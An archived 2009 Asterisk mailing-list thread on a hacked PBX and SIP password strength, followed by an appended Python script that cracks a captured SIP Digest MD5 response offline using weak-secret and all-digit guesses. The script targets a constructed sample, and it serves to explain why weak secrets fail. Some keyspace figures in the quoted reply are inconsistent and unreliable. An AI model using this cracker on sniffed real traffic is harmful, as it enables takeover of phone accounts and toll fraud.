[asterisk-biz] PBX got Hacked

Andrew M. Lauppe alauppe at anteil.com
Tue Mar 10 16:16:33 CDT 2009


Very insightful, thank you Bret.

Barring packet sniffing (which can only be done along the route, right?),
more secure passwords would make a real difference.

Here is a question: has anyone on the list had an account hacked where
the password wasn't stupid (where stupid = 1234, 1111, secret, ${EXTEN}, etc.)?

My thought is, the botnets are probably looking for low-hanging fruit.
I'd love to know if anyone has evidence that that isn't the case.

Andy

Anteil, Inc. <http://www.anteil.com>
------------------------------------------------------------------------
Andrew M. Lauppe
Consultant
4051B Executive Park Dr.
Harrisburg, PA 17111
------------------------------------------------------------------------
+1 (877) OS-LINUX x23
+1 (484) 421-9919 direct



Trixter aka Bret McDanel wrote:
> On Tue, 2009-03-10 at 16:14 -0400, Andrew M. Lauppe wrote:
>
>> We discussed this on freenode #freepbx today, and someone did the
>> following math.
>>
>> A 20 digit numerical password/secret (numerical meaning only 0-9 -
>> obviously), attacked via brute force at 5,000,000 passwords per
>> second, would take more than 600,000+ years to crack. I didn't verify
>> but it looks about right.
>>
> 20 digit is 100,000,000,000,000,000,000 combinations assuming that there
> are no blacklisted ones in that space.
>
> 100,000,000,000,000 seconds at 5M/sec (for reference, about what the
> total US debt is, including Social Security and other things that
> normally don't show in the national debt numbers).
>
> about 3.1M years for an exhaustive search, statistically speaking it
> would be half that time on average if you are doing multiple, or about
> 1.6M years.
>
> If the password is alphanumeric then it goes from 100 million trillion
> to 13,367,495,000,000,000,000,000,000,000,000 or 13,367 trillion
> trillion and I am not even going into case sensitivity or other
> characters that could be used.
>
> If you just used upper case letters and numbers, 10 characters would be
> about 23 years @ 5M/sec for an exhaustive search.  12 would be 30k
> years.  See below about how this time could be shortened.
>
>> Lesson of the day? Sure, more secure passwords aren't THE solution,
>> but they sure help. I'm pretty sure any attempt to brute force a SIP
>> password on an Asterisk box at anything approaching 5 million passwords
>> per second would have side effects that would bring the attack to your
>> attention (like bringing your SIP stack to its knees, perhaps).
>>
>
> It depends on how they are doing it.  Brute forcing *can* be via captured
> packets; everything needed to get the password is in the auth packets in
> SIP.  There are a lot of different ways to get the hashes: they may be
> able to get the hash without really doing much else, or they may be in a
> position to do much more evil things.
>
>> With most phones being auto-provisioned, the length of the password
>> shouldn't be a limiting factor. Make your passwords/secrets more
>> complex and we can be done with this conversation. Please.
>>
> Well, it is MD5 in SIP, so the 5M/sec doesn't really hold if they are
> doing it on a botnet or similar that is outside your control via
> captured headers.  Of course, stopping people from capturing headers is
> beyond the scope of a packet filtering system.
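
Bret's point that a captured SIP exchange carries everything needed to recover the secret, and the keyspace arithmetic both posters work through by hand, as an added worked example in Python. This is not code from the thread, from Asterisk or from FreePBX. The realm, nonce, username, URI and the secret "1234" are a constructed sample; the Authorization header is generated from that secret so the block runs offline and the cracker has a real target. It assumes the qop-less RFC 2617 Digest form (response = MD5(MD5(user:realm:pass):nonce:MD5(method:uri))), which is what a 2009-era SIP phone sends in reply to a 401.

```python
"""Offline brute force of a captured SIP Digest (MD5) exchange, plus the
keyspace arithmetic the thread does by hand.  Added example, not from the post."""
import hashlib
import itertools
import re
from typing import Iterable, Optional

# Constructed sample capture (not from the thread).  Realm, nonce, username
# and URI are invented; the response digest is generated below from the weak
# secret "1234" so the block runs offline and the cracker has a real target.
REALM = "asterisk"
NONCE = "4f5d3a2b1c9e"
USERNAME = "201"
URI = "sip:pbx.example.invalid"
METHOD = "REGISTER"
_SAMPLE_SECRET = "1234"  # the value the attacker is trying to recover


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(username: str, realm: str, password: str,
                    method: str, uri: str, nonce: str) -> str:
    """RFC 2617 Digest response without qop, as a 2009-era SIP stack sends it:
    MD5(HA1:nonce:HA2) with HA1 = MD5(user:realm:pass), HA2 = MD5(method:uri)."""
    ha1 = md5_hex(f"{username}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1}:{nonce}:{ha2}")


# What a sniffer on the path would see: the 401 challenge and the phone's reply.
CHALLENGE = f'WWW-Authenticate: Digest realm="{REALM}", nonce="{NONCE}", algorithm=MD5'
_resp = digest_response(USERNAME, REALM, _SAMPLE_SECRET, METHOD, URI, NONCE)
AUTHORIZATION = (f'Authorization: Digest username="{USERNAME}", realm="{REALM}", '
                 f'nonce="{NONCE}", uri="{URI}", response="{_resp}", algorithm=MD5')

_PARAM = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')


def parse_digest(header: str) -> dict:
    """Split a Digest header's key=value parameters (quoted or bare) into a dict."""
    _, _, params = header.partition("Digest ")
    return {key: quoted or bare for key, quoted, bare in _PARAM.findall(params)}


def crack(authorization: str, method: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline guess-and-check against one captured Authorization header.
    Nothing is sent to the PBX, so its rate limiting never sees a single attempt;
    HA2 and the username:realm prefix are fixed, so each guess costs two MD5s."""
    auth = parse_digest(authorization)
    ha2 = md5_hex(f"{method}:{auth['uri']}")
    prefix = f"{auth['username']}:{auth['realm']}:"
    target = auth["response"].lower()
    for secret in candidates:
        ha1 = md5_hex(prefix + secret)
        if md5_hex(f"{ha1}:{auth['nonce']}:{ha2}") == target:
            return secret
    return None


def stupid_list(username: str) -> list:
    """The secrets the thread calls stupid: fixed strings and the extension itself."""
    return ["1234", "1111", "secret", username]


def numeric_candidates(max_len: int) -> Iterable[str]:
    """Every all-digit secret of length 1..max_len, shortest first."""
    for length in range(1, max_len + 1):
        for digits in itertools.product("0123456789", repeat=length):
            yield "".join(digits)


def exhaustive_years(alphabet: int, length: int, guesses_per_sec: float) -> float:
    """Years to try every `length`-symbol secret over an `alphabet`-symbol set."""
    return alphabet ** length / guesses_per_sec / (365 * 24 * 3600)


if __name__ == "__main__":
    print(CHALLENGE)
    print(AUTHORIZATION)
    print("wordlist hit:", crack(AUTHORIZATION, METHOD, stupid_list(USERNAME)))
    print("numeric hit: ", crack(AUTHORIZATION, METHOD, numeric_candidates(4)))
    for alphabet, length in ((10, 20), (36, 10), (36, 12)):
        years = exhaustive_years(alphabet, length, 5e6)
        print(f"{alphabet}^{length} at 5M/s: {years:,.0f} years")
```

The 5M/sec figure in the thread is a rate aimed at the PBX. Against a captured header the loop above makes no network round trip and leaves nothing in the Asterisk log, so the rate is bounded only by the attacker's hardware, which is why Bret says the figure does not hold for a botnet working from captured headers. The secret length still decides whether that matters: the all-digit 4-character space is exhausted in milliseconds here, while the 20-digit and 36-symbol spaces the posters compute stay out of reach even at much higher rates.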